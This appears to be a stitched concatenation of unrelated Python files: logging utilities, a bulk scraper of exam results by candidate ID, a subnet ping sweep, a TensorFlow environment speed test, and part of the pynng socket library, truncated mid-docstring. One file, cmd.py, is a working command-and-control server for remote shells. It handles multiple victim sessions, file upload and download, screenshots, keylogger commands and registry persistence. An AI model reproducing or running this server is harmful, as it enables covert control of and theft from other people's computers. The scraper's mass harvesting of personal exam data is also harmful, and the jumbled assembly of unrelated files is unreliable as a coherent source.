def excepthook(exctype, value, traceback):
# For interruptions, call the original exception handler.
if issubclass(exctype, (KeyboardInterrupt, SigTermReceived)):
sys.__excepthook__(exctype, value, traceback)
return
root_logger.critical("Uncaught exception", exc_info=(exctype, value, traceback))
sys.excepthook = excepthook
# Ensure warnings issued by the 'warnings' module will be redirected to the logging system.
logging.captureWarnings(True)
def teardown_logging():
"""
Cleanup any logging fixtures created from :func:`initialize_logging()`. Should
be called at the end of your script.
"""
global _LOGGING_HOST, _LOGGING_PORT, _LOGGING_SERVER, _LOGGING_SERVER_THREAD
if _LOGGING_SERVER is not None:
_LOGGING_SERVER.abort = True
if _LOGGING_SERVER_THREAD is not None:
_LOGGING_SERVER_THREAD.join()
_LOGGING_SERVER_THREAD = None
if _LOGGING_SERVER is not None:
_LOGGING_SERVER = None
@contextmanager
def insert_handler(handler: logging.Handler) -> Generator[None, None, None]:
"""
A context manager that can be used to route logs to a specific handler temporarily.
"""
root_logger = logging.getLogger()
from .tqdm import logger as tqdm_logger
formatter = get_formatter()
handler.setFormatter(formatter)
for logger in (root_logger, click_logger, tqdm_logger):
logger.addHandler(handler)
try:
yield None
finally:
for logger in (root_logger, click_logger, tqdm_logger):
logger.removeHandler(handler)
def file_handler(filepath: PathOrStr) -> ContextManager[None]:
"""
A context manager that can be used to route logs to a file by adding a
:class:`logging.FileHandler` to the root logger's handlers.
For example,
.. code-block::
from tango.common.logging import initialize_logging, file_handler, teardown_logging
initialize_logging(log_level="info")
logger = logging.getLogger()
logger.info("Hi!")
with file_handler("log.out"):
logger.info("This message should also go into 'log.out'")
teardown_logging()
"""
handler = logging.FileHandler(str(filepath))
return insert_handler(handler)
|
MainTest.py | import bs4, requests, os, xlsxwriter, time, multiprocessing
start_time = time.time()
def generateID(n):
canID = str(n)
count = 0
num = n
while num > 0:
count += 1
num//=10
count0 = 8 - count
for i in range (count0):
canID = "0" + canID
return canID
workbook = xlsxwriter.Workbook('PhoDiemData1.xlsx')
worksheet = workbook.add_worksheet()
row = 2
col = 0
def abc(n):
link = 'https://news.zing.vn/tra-cuu-diem-thi-thpt-2017-ket-qua.html?text=' + generateID(n)
res = requests.get(link)
soup = bs4.BeautifulSoup(res.text, "html.parser")
participantInfo = soup.select('.table td')
return participantInfo
if __name__ =='__main__':
for count in range (25004950,25005000,1):
p = multiprocessing.Process(target=abc(count))
if abc != []:
worksheet.write(row, col, abc(count)[0].text)
worksheet.write(row, col + 1, abc(count)[1].text)
worksheet.write(row, col + 2, abc(count)[2].text)
worksheet.write(row, col + 3, abc(count)[3].text)
worksheet.write(row, col + 4, abc(count)[5].text)
row += 1
p.start()
workbook.close()
print("--- %s seconds ---" % (time.time() - start_time)) |
cmd.py | import socket
import termcolor
import json
import os
import threading
def reliable_recv(target):
data = ''
while True:
try:
data = data + target.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def reliable_send(target, data):
jsondata = json.dumps(data)
target.send(jsondata.encode())
def upload_file(target, file_name):
f = open(file_name, 'rb')
target.send(f.read())
def download_file(target, file_name):
f = open(file_name, 'wb')
target.settimeout(1)
chunk = target.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = target.recv(1024)
except socket.timeout as e:
break
target.settimeout(None)
f.close()
def target_communication(target, ip):
count = 0
while True:
command = input('* Shell~%s: ' % str(ip))
reliable_send(target, command)
if command == 'quit':
break
elif command == 'background':
break
elif command == 'clear':
os.system('clear')
elif command[:3] == 'cd ':
pass
elif command[:6] == 'upload':
upload_file(target, command[7:])
elif command[:8] == 'download':
download_file(target, command[9:])
elif command[:10] == 'screenshot':
f = open('screenshot%d' % (count), 'wb')
target.settimeout(3)
chunk = target.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = target.recv(1024)
except socket.timeout as e:
break
target.settimeout(None)
f.close()
count += 1
elif command == 'help':
print(termcolor.colored('''\n
quit --> Quit Session With The Target
clear --> Clear The Screen
cd *Directory Name* --> Changes Directory On Target System
upload *file name* --> Upload File To The target Machine
download *file name* --> Download File From Target Machine
keylog_start --> Start The Keylogger
keylog_dump --> Print Keystrokes That The Target Inputted
keylog_stop --> Stop And Self Destruct Keylogger File
persistence *RegName* *fileName* --> Create Persistence In Registry'''),'green')
else:
result = reliable_recv(target)
print(result)
def accept_connections():
while True:
if stop_flag:
break
sock.settimeout(1)
try:
target, ip = sock.accept()
targets.append(target)
ips.append(ip)
print(termcolor.colored(str(ip) + ' has connected!', 'green'))
except:
pass
targets = []
ips = []
stop_flag = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('192.168.1.9', 5555))
sock.listen(5)
t1 = threading.Thread(target=accept_connections)
t1.start()
print(termcolor.colored('[+] Waiting For The Incoming Connections ...', 'green'))
while True:
command = input('[**] Command & Control Center: ')
if command == 'targets':
counter = 0
for ip in ips:
print('Session ' + str(counter) + ' --- ' + str(ip))
counter += 1
elif command == 'clear':
os.system('clear')
elif command[:7] == 'session':
try:
num = int(command[8:])
tarnum = targets[num]
tarip = ips[num]
target_communication(tarnum, tarip)
except:
print('[-] No Session Under That ID Number')
elif command == 'exit':
for target in targets:
reliable_send(target, 'quit')
target.close()
sock.close()
stop_flag = True
t1.join()
break
elif command[:4] == 'kill':
targ = targets[int(command[5:])]
ip = ips[int(command[5:])]
reliable_send(targ, 'quit')
targ.close()
targets.remove(targ)
ips.remove(ip)
elif command[:7] == 'sendall':
x = len(targets)
print(x)
i = 0
try:
while i < x:
tarnumber = targets[i]
print(tarnumber)
reliable_send(tarnumber, command)
i += 1
except:
print('Failed')
else:
print(termcolor.colored("[!!] Command Doesn't Exist", 'red'))
|
mtping.py | import subprocess
import threading
def ping(host):
rc = subprocess.call(
'ping -c2 %s &> /dev/null' % host,
shell=True
)
if rc == 0:
print(host)
if __name__ == '__main__':
ips = ['172.40.58.%s' % i for i in range(1, 255)]
for ip in ips:
# 创建线程,ping是上面定义的函数, args是传给ping函数的参数
t = threading.Thread(target=ping, args=(ip,))
t.start() # 执行ping(ip)
|
time_env.py | '''
Copyright (c) 2018 Uber Technologies, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import time
import threading
import tensorflow as tf
import gym_tensorflow
from gym_tensorflow.wrappers import AutoResetWrapper
def main(num_actors, num_threads, game_id='pong',
use_tfenv=True, render=False):
'''Speed test.
Using 16 actors * 1 threads, it should be as high as 10000 step/s.
Using 128 actors * 16 threads (full stress test), it should be as high as 30000 steps/s
under a 40-thread (20-CPU * 2 HT) CPU machine.
'''
counter = tf.Variable(0, tf.int64)
def make_env():
env = AutoResetWrapper(gym_tensorflow.atari.AtariEnv(game_id, num_actors))
tf_rew, tf_done = env.step(tf.zeros((num_actors,), tf.int32))
render_op = env.env.render() if render else tf.no_op()
reward_op = tf_rew
counter_op = tf.assign_add(counter, num_actors, use_locking=True)
def _run(sess):
sess.run([reward_op, counter_op, render_op])
return _run
step_op = [make_env() for _ in range(num_threads)]
def thread_f(sess, e):
while True:
e(sess)
time.sleep(0)
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
threads = [threading.Thread(target=thread_f, args=(sess, e)) for e in step_op]
for t in threads:
t.setDaemon(True)
t._state = 0
t.start()
print("main thread start")
tstart = time.time()
num_steps = 0
while True:
diff = sess.run(counter) - num_steps
time_str = time.strftime('%Y%m%d-%H%M%S')
print('{} Rate: {:.0f} steps/s'.format(time_str, diff / (time.time() - tstart)), flush=True)
tstart = time.time()
num_steps += diff
time.sleep(5)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--num-actors', default=128, type=int, help='Number of actors per thread.')
parser.add_argument('--num-threads', default=16, type=int, help='Number of threads to run.')
parser.add_argument('--render', action='store_true', help='If set, fetch render op as well (slower)')
args = parser.parse_args()
main(num_actors=args.num_actors,
num_threads=args.num_threads,
render=args.render)
|
nng.py | """
Provides a Pythonic interface to cffi nng bindings
"""
import logging
import threading
import atexit
import pynng
from ._nng import ffi, lib
from .exceptions import check_err
from . import options
from . import _aio
logger = logging.getLogger(__name__)
__all__ = '''
ffi
Bus0
Pair0
Pair1
Pull0 Push0
Pub0 Sub0
Req0 Rep0
Socket
Surveyor0 Respondent0
'''.split()
# Register an atexit handler to call the nng_fini() cleanup function.
# This is necessary to ensure:
# * The Python interpreter doesn't finalize and kill the reap thread
# during a callback to _nng_pipe_cb
# * Cleanup background queue threads used by NNG
def _pynng_atexit():
lib.nng_fini()
atexit.register(_pynng_atexit)
def _ensure_can_send(thing):
"""
It's easy to accidentally pass in a str instead of bytes when send()ing.
This gives a more informative message if a ``str`` was accidentally passed
to a send method.
"""
# at some point it might be nice to check for the specific types we **can**
# send...
if isinstance(thing, str):
raise ValueError('Cannot send type str. '
'Maybe you left out a ".encode()" somewhere?')
def to_char(charlike):
"""Convert str or bytes to char*."""
# fast path for stuff that doesn't need to be changed.
if isinstance(charlike, ffi.CData):
return charlike
if isinstance(charlike, str):
charlike = charlike.encode()
charlike = ffi.new('char[]', charlike)
return charlike
class _NNGOption:
"""A descriptor for more easily getting/setting NNG option."""
# this class should not be instantiated directly! Instantiation will work,
# but getting/setting will fail.
# subclasses set _getter and _setter to the module-level getter and setter
# functions
_getter = None
_setter = None
def __init__(self, option_name):
self.option = to_char(option_name)
def __get__(self, instance, owner):
# have to look up the getter on the class
if self._getter is None:
raise TypeError("{} cannot be set".format(self.__class__))
return self.__class__._getter(instance, self.option)
def __set__(self, instance, value):
if self._setter is None:
raise TypeError("{} is readonly".format(self.__class__))
self.__class__._setter(instance, self.option, value)
class IntOption(_NNGOption):
"""Descriptor for getting/setting integer options"""
_getter = options._getopt_int
_setter = options._setopt_int
class MsOption(_NNGOption):
"""Descriptor for getting/setting durations (in milliseconds)"""
_getter = options._getopt_ms
_setter = options._setopt_ms
class SockAddrOption(_NNGOption):
"""Descriptor for getting/setting durations (in milliseconds)"""
_getter = options._getopt_sockaddr
class SizeOption(_NNGOption):
"""Descriptor for getting/setting size_t options"""
_getter = options._getopt_size
_setter = options._setopt_size
class StringOption(_NNGOption):
"""Descriptor for getting/setting string options"""
_getter = options._getopt_string
_setter = options._setopt_string
class BooleanOption(_NNGOption):
"""Descriptor for getting/setting boolean values"""
_getter = options._getopt_bool
_setter = options._setopt_bool
class PointerOption(_NNGOption):
"""Descriptor for setting pointer values"""
_setter = options._setopt_ptr
class NotImplementedOption(_NNGOption):
"""Represents a currently un-implemented option in Python."""
def __init__(self, option_name, errmsg):
super().__init__(option_name)
self.errmsg = errmsg
def __get__(self, instance, owner):
raise NotImplementedError(self.errmsg)
def __set__(self, instance, value):
raise NotImplementedError(self.errmsg)
class Socket:
"""
Open a socket with one of the scalability protocols. This should not be
instantiated directly; instead, one of its subclasses should be used.
There is one subclass per protocol. The available protocols are:
* :class:`Pair0`
* :class:`Pair1`
* :class:`Req0` / :class:`Rep0`
* :class:`Pub0` / :class:`Sub0`
* :class:`Push0` / :class:`Pull0`
* :class:`Surveyor0` / :class:`Respondent0`
* :class:`Bus0`
The socket initializer receives no positional arguments. It accepts the
following keyword arguments, with the same meaning as the :ref:`attributes
<socket-attributes>` described below: ``recv_timeout``, ``send_timeout``,
``recv_buffer_size``, ``send_buffer_size``, ``reconnect_time_min``,
``reconnect_time_max``, and ``name``
To talk to another socket, you have to either :meth:`~Socket.dial`
its address, or :meth:`~Socket.listen` for connections. Then you can
:meth:`~Socket.send` to send data to the remote sockets or
:meth:`~Socket.recv` to receive data from the remote sockets.
Asynchronous versions are available as well, as :meth:`~Socket.asend`
and :meth:`~Socket.arecv`. The supported event loops are :mod:`asyncio`
and `Trio`_. You must ensure that you :meth:`~Socket.close` the socket
when you are finished with it. Sockets can also be used as a context
manager; this is the preferred way to use them when possible.
.. _socket-attributes:
Sockets have the following attributes. Generally, you should set these
attributes before :meth:`~Socket.listen`-ing or
:meth:`~Socket.dial`-ing, or by passing them in as keyword arguments
when creating the :class:`Socket`:
* **recv_timeout** (int): Receive timeout, in ms. If a socket takes longer
than the specified time, raises a ``pynng.exceptions.Timeout``.
Corresponds to library option ``NNG_OPT_RECVTIMEO``
* **send_timeout** (int): Send timeout, in ms. If the message cannot
be queued in the specified time, raises a pynng.exceptions.Timeout.
Corresponds to library option ``NNG_OPT_SENDTIMEO``.
* **recv_max_size** (int): The largest size of a message to receive.
Messages larger than this size will be silently dropped. A size of 0
indicates unlimited size. The default size is 1 MB.
* **recv_buffer_size** (int): The number of messages that the socket
will buffer on receive. Corresponds to ``NNG_OPT_RECVBUF``.
* **send_buffer_size** (int): The number of messages that the socket
will buffer on send. Corresponds to ``NNG_OPT_SENDBUF``.
* **name** (str): The socket name. Corresponds to
``NNG_OPT_SOCKNAME``. This is useful for debugging purposes.
* **raw** (bool): A boolean, indicating whether the socket is raw or cooked.
Returns ``True`` if the socket is raw, else ``False``. This property
is read-only. Corresponds to library option ``NNG_OPT_RAW``. For
more information see `nng's documentation.
<https://nanomsg.github.io/nng/man/v1.0.1/nng.7.html#raw_mode>`_
Note that currently, pynng does not support ``raw`` mode sockets, but
we intend to `in the future
<https://github.com/codypiersall/pynng/issues/35>`_:
* **protocol** (int): Read-only option which returns the 16-bit number
of the socket's protocol.
* **protocol_name** (str): Read-only option which returns the name of the
socket's protocol.
* **peer** (int): Returns the peer protocol id for the socket.
* **local_address**: The :class:`~pynng.sockaddr.SockAddr` representing
the local address. Corresponds to ``NNG_OPT_LOCADDR``.
* **reconnect_time_min** (int): The minimum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMINT``.
This can also be overridden on the dialers.
* **reconnect_time_max** (int): The maximum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMAXT``.
If this is non-zero, then the time between successive connection
attempts will start at the value of ``reconnect_time_min``, and grow
exponentially, until it reaches this value. This option can be set
on the socket, or on the dialers associated with the socket.
* **recv_fd** (int): The receive file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can receive data without blocking. Corresponds to
``NNG_OPT_RECVFD``.
* **send_fd** (int): The sending file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can send data without blocking. Corresponds to
``NNG_OPT_SENDFD``.
.. Note::
When used in :func:`select.poll` or :func:`select.select`,
``recv_fd`` and ``send_fd`` are both marked as **readable** when
they can receive or send data without blocking. So the upshot is
that for :func:`select.select` they should be passed in as the
*rlist* and for :meth:`select.poll.register` the *eventmask*
should be ``POLLIN``.
* **tls_config** (:class:`~pynng.TLSConfig`): The TLS configuration for
this socket. This option is only valid if the socket is using the
TLS transport. See :class:`~pynng.TLSConfig` for information about
the TLS configuration. Corresponds to ``NNG_OPT_TLS_CONFIG``. This
option is write-only.
.. _Trio: https://trio.readthedocs.io
"""
# TODO: Do we need to document ttl_max? We're not supporting nng_device
# yet, so I guess not?
# the following options correspond to nng options documented at
# https://nanomsg.github.io/nng/man/v1.0.1/nng_options.5.html
name = StringOption('socket-name')
raw = BooleanOption('raw')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
recv_buffer_size = IntOption('recv-buffer')
send_buffer_size = IntOption('send-buffer')
recv_timeout = MsOption('recv-timeout')
send_timeout = MsOption('send-timeout')
ttl_max = IntOption('ttl-max')
recv_max_size = SizeOption('recv-size-max')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_fd = IntOption('recv-fd')
send_fd = IntOption('send-fd')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
def __init__(self, *,
dial=None,
listen=None,
recv_timeout=None,
send_timeout=None,
recv_buffer_size=None,
send_buffer_size=None,
recv_max_size=None,
reconnect_time_min=None,
reconnect_time_max=None,
opener=None,
block_on_dial=None,
name=None,
tls_config=None,
async_backend=None
):
# mapping of id: Python objects
self._dialers = {}
self._listeners = {}
self._pipes = {}
self._on_pre_pipe_add = []
self._on_post_pipe_add = []
self._on_post_pipe_remove = []
self._pipe_notify_lock = threading.Lock()
self._async_backend = async_backend
self._socket = ffi.new('nng_socket *',)
if opener is not None:
self._opener = opener
if opener is None and not hasattr(self, '_opener'):
raise TypeError('Cannot directly instantiate a Socket. Try a subclass.')
check_err(self._opener(self._socket))
if tls_config is not None:
self.tls_config = tls_config
if recv_timeout is not None:
self.recv_timeout = recv_timeout
if send_timeout is not None:
self.send_timeout = send_timeout
if recv_max_size is not None:
self.recv_max_size = recv_max_size
if reconnect_time_min is not None:
self.reconnect_time_min = reconnect_time_min
if reconnect_time_max is not None:
self.reconnect_time_max = reconnect_time_max
if recv_buffer_size is not None:
self.recv_buffer_size = recv_buffer_size
if send_buffer_size is not None:
self.send_buffer_size = send_buffer_size
if name is not None:
self.name = name
# set up pipe callbacks. This **must** be called before listen/dial to
# avoid race conditions.
handle = ffi.new_handle(self)
self._handle = handle
for event in (lib.NNG_PIPE_EV_ADD_PRE, lib.NNG_PIPE_EV_ADD_POST,
lib.NNG_PIPE_EV_REM_POST):
check_err(lib.nng_pipe_notify(
self.socket, event, lib._nng_pipe_cb, handle))
if listen is not None:
self.listen(listen)
if dial is not None:
self.dial(dial, block=block_on_dial)
def dial(self, address, *, block=None):
"""Dial the specified address.
Args:
address: The address to dial.
block: Whether to block or not. There are three possible values
this can take:
1. If ``True``, a blocking dial is attempted. If it fails for
any reason, the dial fails and an exception is raised.
2. If ``False``, a non-blocking dial is started. The dial is
retried periodically in the background until it is
successful.
3. (**Default behavior**): If ``None``, a blocking dial is
first attempted. If it fails an exception is logged (using
the Python logging module), then a non-blocking dial is
done.
"""
if block:
return self._dial(address, flags=0)
elif block is None:
try:
return self.dial(address, block=False)
except pynng.ConnectionRefused:
msg = 'Synchronous dial failed; attempting asynchronous now'
logger.exception(msg)
return self.dial(address, block=False)
else:
return self._dial(address, flags=lib.NNG_FLAG_NONBLOCK)
def _dial(self, address, flags=0):
"""Dial specified ``address``
``flags`` usually do not need to be given.
"""
dialer = ffi.new('nng_dialer *')
ret = lib.nng_dial(self.socket, to_char(address), dialer, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
d_id = lib.nng_dialer_id(dialer[0])
py_dialer = Dialer(dialer, self)
self._dialers[d_id] = py_dialer
return py_dialer
def listen(self, address, flags=0):
"""Listen at specified address.
``listener`` and ``flags`` usually do not need to be given.
"""
listener = ffi.new('nng_listener *')
ret = lib.nng_listen(self.socket, to_char(address), listener, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
l_id = lib.nng_listener_id(listener[0])
py_listener = Listener(listener, self)
self._listeners[l_id] = py_listener
return py_listener
def close(self):
"""Close the socket, freeing all system resources."""
# if a TypeError occurs (e.g. a bad keyword to __init__) we don't have
# the attribute _socket yet. This prevents spewing extra exceptions
if hasattr(self, '_socket'):
lib.nng_close(self.socket)
# cleanup the list of listeners/dialers. A program would be likely to
# segfault if a user accessed the listeners or dialers after this
# point.
self._listeners = {}
self._dialers = {}
def __del__(self):
self.close()
@property
def socket(self):
return self._socket[0]
def recv(self, block=True):
"""Receive data on the socket. If the request times out the exception
:class:`pynng.Timeout` is raised. If the socket cannot perform that
operation (e.g., a :class:`Pub0`, which can only
:meth:`~Socket.send`), the exception :class:`pynng.NotSupported`
is raised.
Args:
block: If block is True (the default), the function will not return
until the operation is completed or times out. If block is False,
the function will return data immediately. If no data is ready on
the socket, the function will raise ``pynng.TryAgain``.
"""
# TODO: someday we should support some kind of recv_into() operation
# where the user provides the data buffer.
flags = lib.NNG_FLAG_ALLOC
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
data = ffi.new('char **')
size_t = ffi.new('size_t *')
ret = lib.nng_recv(self.socket, data, size_t, flags)
check_err(ret)
recvd = ffi.unpack(data[0], size_t[0])
lib.nng_free(data[0], size_t[0])
return recvd
def send(self, data):
"""Sends ``data`` (either ``bytes`` or ``bytearray``) on socket."""
_ensure_can_send(data)
err = lib.nng_send(self.socket, data, len(data), 0)
check_err(err)
async def arecv(self):
"""The asynchronous version of :meth:`~Socket.recv`"""
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronous version of :meth:`~Socket.send`."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.asend(data)
def __enter__(self):
return self
def __exit__(self, *tb_info):
self.close()
@property
def dialers(self):
"""A list of the active dialers"""
return tuple(self._dialers.values())
@property
def listeners(self):
"""A list of the active listeners"""
return tuple(self._listeners.values())
@property
def pipes(self):
"""A list of the active pipes"""
return tuple(self._pipes.values())
def _add_pipe(self, lib_pipe):
# this is only called inside the pipe callback.
pipe_id = lib.nng_pipe_id(lib_pipe)
# If the pipe already exists in the Socket, don't create a new one
if pipe_id not in self._pipes:
pipe = Pipe(lib_pipe, self)
self._pipes[pipe_id] = pipe
return self._pipes[pipe_id]
def _remove_pipe(self, lib_pipe):
pipe_id = lib.nng_pipe_id(lib_pipe)
del self._pipes[pipe_id]
def new_context(self):
"""Return a new :class:`Context` for this socket."""
return Context(self)
def add_pre_pipe_connect_cb(self, callback):
"""
Add a callback which will be called before a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a Pipe. The
socket associated with the pipe can be accessed through the pipe's
``socket`` attribute. If the pipe is closed, the callbacks for
post_pipe_connect and post_pipe_remove will not be called.
"""
self._on_pre_pipe_add.append(callback)
def add_post_pipe_connect_cb(self, callback):
"""
Add a callback which will be called after a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_add.append(callback)
def add_post_pipe_remove_cb(self, callback):
"""
Add a callback which will be called after a Pipe is removed from a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_remove.append(callback)
def remove_pre_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for pre pipe connect
events
"""
self._on_pre_pipe_add.remove(callback)
def remove_post_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe connect
events
"""
self._on_post_pipe_add.remove(callback)
def remove_post_pipe_remove_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe remove
events
"""
self._on_post_pipe_remove.remove(callback)
def _try_associate_msg_with_pipe(self, msg):
""" Looks up the nng_msg associated with the ``msg`` and attempts to
set it on the Message ``msg``
"""
# Wrap pipe handling inside the notify lock since we can create
# a new Pipe and associate it with the Socket if the callbacks
# haven't been called yet. This will ensure there's no race
# condition with the pipe callbacks.
with self._pipe_notify_lock:
lib_pipe = lib.nng_msg_get_pipe(msg._nng_msg)
pipe_id = lib.nng_pipe_id(lib_pipe)
try:
msg.pipe = self._pipes[pipe_id]
except KeyError:
# A message may have been received before the pipe callback was called.
# Create a new Pipe and associate it with the Socket.
# When the callback is called, it will detect that the pipe was already.
# if pipe_id < 0, that *probably* means we hit a race where the
# associated pipe was closed.
if pipe_id >= 0:
# Add the pipe to the socket
msg.pipe = self._add_pipe(lib_pipe)
def recv_msg(self, block=True):
"""Receive a :class:`Message` on the socket."""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_recvmsg(self.socket, msg_p, flags))
msg = msg_p[0]
msg = Message(msg)
self._try_associate_msg_with_pipe(msg)
return msg
def send_msg(self, msg, block=True):
"""Send the :class:`Message` ``msg`` on the socket.
.. Note::
It's may be more convenient to call :meth:`Pipe.send` than this
method.
"""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
with msg._mem_freed_lock:
msg._ensure_can_send()
check_err(lib.nng_sendmsg(self.socket, msg._nng_msg, flags))
msg._mem_freed = True
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the socket.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
Asynchronously receive the :class:`Message` ``msg`` on the socket.
"""
with _aio.AIOHelper(self, self._async_backend) as aio:
msg = await aio.arecv_msg()
self._try_associate_msg_with_pipe(msg)
return msg
class Bus0(Socket):
"""A bus0 socket. The Python version of `nng_bus
<https://nanomsg.github.io/nng/man/tip/nng_bus.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
A :class:`Bus0` socket sends a message to all directly connected peers.
This enables creating mesh networks. Note that messages are only sent to
*directly* connected peers. You must explicitly connect all nodes with the
:meth:`~Socket.listen` and corresponding :meth:`~Socket.listen` calls.
Here is a demonstration of using the bus protocol:
.. literalinclude:: snippets/bus0_sync.py
:language: python3
"""
_opener = lib.nng_bus0_open
class Pair0(Socket):
"""A socket for bidrectional, one-to-one communication, with a single
partner. The Python version of `nng_pair0
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
This is the most basic type of socket.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
This demonstrates the synchronous API:
.. literalinclude:: snippets/pair0_sync.py
:language: python3
This demonstrates the asynchronous API using `Trio`_. Remember that
:mod:`asyncio` is also supported.
.. literalinclude:: snippets/pair0_async.py
:language: python3
"""
_opener = lib.nng_pair0_open
class Pair1(Socket):
"""A socket for bidrectional communication with potentially many peers.
The Python version of `nng_pair1
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`. It also has one extra
keyword-only argument, ``polyamorous``, which must be set to ``True`` to
connect with more than one peer.
.. Warning::
If you want to connect to multiple peers you **must** pass
``polyamorous=True`` when you create your socket. ``polyamorous`` is a
read-only attribute of the socket and cannot be changed after creation.
.. Warning::
Pair1 was an experimental feature in nng, and is currently deprecated.
It will likely be removed in the future; see `nng's docs
<https://nng.nanomsg.org/man/v1.3.2/nng_pair_open.3.html>`_ for
details.
To get the benefits of polyamory, you need to use the methods that work
with :class:`Message` objects: :meth:`Socket.recv_msg` and
:meth:`Socket.arecv_msg` for receiving, and :meth:`Pipe.send`
and :meth:`Pipe.asend` for sending.
Here is an example of the synchronous API, where a single listener connects
to multiple peers. This is more complex than the :class:`Pair0` case,
because it requires to use the :class:`Pipe` and :class:`Message`
interfaces.
.. literalinclude:: snippets/pair1_sync.py
And here is an example using the async API, using `Trio`_.
.. literalinclude:: snippets/pair1_async.py
"""
def __init__(self, *, polyamorous=False, **kwargs):
# make sure we don't listen/dial before setting polyamorous, so we pop
# them out of kwargs, then do the dial/listen below.
# It's not beautiful, but it will work.
dial_addr = kwargs.pop('dial', None)
listen_addr = kwargs.pop('dial', None)
super().__init__(**kwargs)
if polyamorous:
self._opener = lib.nng_pair1_open_poly
else:
self._opener = lib.nng_pair1_open
# now we can do the listen/dial
if dial_addr is not None:
self.dial(dial_addr, block=kwargs.get('block_on_dial'))
if listen_addr is not None:
self.listen(listen_addr)
_opener = lib.nng_pair1_open_poly
polyamorous = BooleanOption('pair1:polyamorous')
class Push0(Socket):
"""A push0 socket.
The Python version of `nng_push
<https://nanomsg.github.io/nng/man/tip/nng_push.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Push0` socket is the pushing end of a data pipeline. Data sent
from a push socket will be sent to a *single* connected :class:`Pull0`
socket. This can be useful for distributing work to multiple nodes, for
example. Attempting to call :meth:`~Socket.recv()` on a Push0 socket
will raise a :class:`pynng.NotSupported` exception.
Here is an example of two :class:`Pull0` sockets connected to a
:class:`Push0` socket.
.. literalinclude:: snippets/pushpull_sync.py
"""
_opener = lib.nng_push0_open
class Pull0(Socket):
"""A pull0 socket.
The Python version of `nng_pull
<https://nanomsg.github.io/nng/man/tip/nng_pull.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Pull0` is the receiving end of a data pipeline. It needs to be
paired with a :class:`Push0` socket.
Attempting to :meth:`~Socket.send()`
with a Pull0 socket will raise a :class:`pynng.NotSupported` exception.
See :class:`Push0` for an example of push/pull in action.
"""
_opener = lib.nng_pull0_open
class Pub0(Socket):
"""A pub0 socket.
The Python version of `nng_pub
<https://nanomsg.github.io/nng/man/tip/nng_pub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`. A :class:`Pub0` socket calls
:meth:`~Socket.send`, the data is published to all connected
:class:`subscribers <Sub0>`.
Attempting to :meth:`~Socket.recv` with a Pub0 socket will raise a
:class:`pynng.NotSupported` exception.
See docs for :class:`Sub0` for an example.
"""
_opener = lib.nng_pub0_open
class Sub0(Socket):
"""A sub0 socket.
The Python version of `nng_sub
<https://nanomsg.github.io/nng/man/tip/nng_sub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one
additional keyword argument: ``topics``. If ``topics`` is given, it must
